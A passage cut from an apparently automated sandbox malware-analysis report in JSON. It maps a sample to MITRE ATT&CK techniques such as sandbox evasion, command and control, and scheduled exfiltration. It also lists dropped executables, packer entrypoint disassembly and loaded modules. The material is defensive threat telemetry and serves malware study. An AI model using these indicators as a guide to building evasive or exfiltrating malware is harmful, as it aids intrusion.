"https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xvpdt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hbpvtv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hfxhd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vjdjljv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rffrrb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nvdfbr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"02886.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2086280.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"84862.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xppdbt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0082442.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hvtvd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"djlrn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"86488.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"246648.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xjnvbp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tjnrdtx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2860666.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"46228.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"226688.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"88406.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0248006.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"08802.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"24440.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xvpdt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hbpvtv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hfxhd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vjdjljv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rffrrb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nvdfbr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"02886.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2086280.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"84862.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xppdbt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0082442.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hvtvd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"djlrn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"86488.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"246648.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xjnvbp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tjnrdtx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2860666.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"46228.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"226688.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"88406.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0248006.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"08802.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"24440.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"2662206.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"2668286.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"22420.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"202828.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"pndnt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"rbbttj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"tdthpd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"rhhbnrn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"txphbj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"0862264.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"6042668.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"6408002.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"8266402.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"trtdln.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"jdtpf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"tbhlt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"trxpd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"82880.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"44882.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"828882.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"2204222.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"028488.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"62820.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000\n \"80840.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"2662206.exe\" loaded module \"MSVCRT.DLL\" at base 77970000\n \"2662206.exe\" loaded module \"SHLWAPI.DLL\" at base 76240000\n \"2662206.exe\" loaded module \"USER32.DLL\" at base 770b0000\n \"2662206.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"202828.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"202828.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"202828.exe\" loaded module \"KERNEL32\" at base 76330000\n \"202828.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"202828.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"202828.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"pndnt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"pndnt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pndnt.exe\" loaded module \"KERNEL32\" at base 76330000\n \"pndnt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhhbnrn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"rhhbnrn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhhbnrn.exe\" loaded module \"KERNEL32\" at base 76330000\n \"rhhbnrn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhhbnrn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"txphbj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"txphbj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"txphbj.exe\" loaded module \"KERNEL32\" at base 76330000\n \"txphbj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"txphbj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"0862264.exe\" loaded module 